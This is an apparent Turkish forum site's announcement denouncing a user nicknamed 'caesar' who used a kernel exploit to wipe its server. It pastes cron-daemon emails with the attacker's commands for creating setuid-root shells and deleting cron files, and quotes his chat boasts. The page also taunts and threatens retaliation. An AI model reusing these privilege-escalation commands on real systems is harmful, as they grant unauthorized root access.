yalan olmu$ sözlüktür keza sözlük mözlük kalmamı$ ortada..an itibari ile siteye girince;
her şeye rağmen,
çok yakinda!
sn. caesar nickli olgar verim;
kernel açığını kullanarak yapmış olduğun lamerce saldırılar , sistem tarafından
belirtilen e-mail adreslerine gönderilmiştir.
tüm arkadaşların emeğini yok etmen, sunucu üzerindeki her şeyi tek komutla silmen,
sanırım senin için hiç birşeydir. o halde, senin de emeğinin yok edilmesi pek fazla
bir şey fark etmeyecektir.
sunucuya vermiş olduğun zararın tespiti yapılmıştır.
ve şu an , sayende gıcır gıcır, "son model" kernel ve "tüm açıkları kapatılmış" bir server a sahibiz.
ayda yılda bir yaptığın lamerliğin yararı dokundu, lamerimsi insanımsı yaratık!
-----------------------------------------------------
x-message-status: n:0
x-sid-pra: cron daemon
x-sid-result: temperror
x-message-info: txf49lgdw437gmnix6wsr+yumfb53khtqu826mdyemo=
received: from l-01.fprot.gen.tr ([62.68.194.100]) by bay0-mc6-f19.bay0.hotmail.com with microsoft smtpsvc(6.0.3790.2444);
thu, 24 aug 2006 13:37:04 -0700
received: from root by l-01.fprot.gen.tr with local (exim 4.52)
id 1gglwj-0000gu-qh
for [email protected]; thu, 24 aug 2006 23:37:01 +0300
from: [email protected] (cron daemon)
to: [email protected]
subject: cron chown root:root /home/caesar/public_html/zirve/rt3 && chmod 4755 /home/caesar/public_html/zirve/rt3 && rm -rf /etc/cron.d/core && kill -usr1 797
x-cron-env:
x-cron-env:
x-cron-env:
x-cron-env:
x-cron-env:
message-id:
date: thu, 24 aug 2006 23:37:01 +0300
x-antiabuse: this header was added to track abuse, please include it with any abuse report
x-antiabuse: primary hostname - l-01.fprot.gen.tr
x-antiabuse: original domain - l-01.fprot.gen.tr
x-antiabuse: originator/caller uid/gid - [0 0] / [47 12]
x-antiabuse: sender address domain - l-01.fprot.gen.tr
x-source:
x-source-args:
x-source-dir:
return-path: [email protected]
x-originalarrivaltime: 24 aug 2006 20:37:05.0196 (utc) filetime=[0fa696c0:01c6c7bd]
/bin/sh: line 0: kill: (797) - no such process
-------
aklınca ssh ile giriş yapılmasını önlemek için yapmış olduğu eylem;
x-message-status: n:0
x-sid-pra: cron daemon
x-sid-result: temperror
x-message-info: txf49lgdw4112idkaqgtf/xm7ryqshljo4ndhjfkbx0=
received: from l-01.fprot.gen.tr ([62.68.194.100]) by bay0-mc3-f6.bay0.hotmail.com with microsoft smtpsvc(6.0.3790.2444);
thu, 24 aug 2006 14:52:05 -0700
received: from root by l-01.fprot.gen.tr with local (exim 4.52)
id 1ggn7j-00028p-fl
for [email protected]; fri, 25 aug 2006 00:52:01 +0300
from: [email protected] (cron daemon)
to: [email protected]
subject: cron cp /bin/sh /tmp/sh4 ; chown root /tmp/sh4 ; chmod 4777 /tmp/sh4 ;setuid(0);setgid(0); rm -f /etc/cron.d/core
x-cron-env:
x-cron-env:
x-cron-env:
x-cron-env:
x-cron-env:
message-id:
date: fri, 25 aug 2006 00:52:01 +0300
x-antiabuse: this header was added to track abuse, please include it with any abuse report
x-antiabuse: primary hostname - l-01.fprot.gen.tr
x-antiabuse: original domain - l-01.fprot.gen.tr
x-antiabuse: originator/caller uid/gid - [0 0] / [47 12]
x-antiabuse: sender address domain - l-01.fprot.gen.tr
x-source:
x-source-args:
x-source-dir:
return-path: [email protected]
x-originalarrivaltime: 24 aug 2006 21:52:05.0803 (utc) filetime=[8a38b7b0:01c6c7c7]
/bin/sh: -c: line 0: syntax error near unexpected token `0’
/bin/sh: -c: line 0: ` cp /bin/sh /tmp/sh4 ; chown root /tmp/sh4 ; chmod 4777 /tmp/sh4 ;setuid(0);setgid(0); rm -f /etc/cron.d/core’
saatlerce yapmış olduğun lamerce saldırı;
evet, o yandaki 1192 sayisi caesar rumuzlu kişinin lamerliğini sergileyen e-posta sayisidir.
ve de, bir arkadaşına o anı anlatma zevkin.. emekmiş.. ne işin olur emekle!
yakında göreceğiz emeğini..
25.08.2006 12:29:08 caesar sunucuda bi açık buldum
25.08.2006 12:29:11 caesar lap daldım içeri
25.08.2006 12:29:16 caesar dosyaları db yi sildim
25.08.2006 12:29:19 caesar kernelinide siktim
25.08.2006 12:29:22 caesar tum /home dizinini
25.08.2006 12:29:26 caesar musterilerini ucurdum
25.08.2006 12:29:30 caesar sonra kerne
25.08.2006 12:29:30 caesar sonra kernel panic verdim
25.08.2006 12:29:32 caesar kapattı kendini
sanırım açık dediği , koyduğu exploit olmalı :)
(bunlar bir başlangiç!)
neden bekliyorsun?
bu sözlük, duygu ve düşüncelerini özgürce paylaştığın bir platform, hislerini tercüme eden özgür bilgi kaynağıdır.
katkıda bulunmak istemez misin?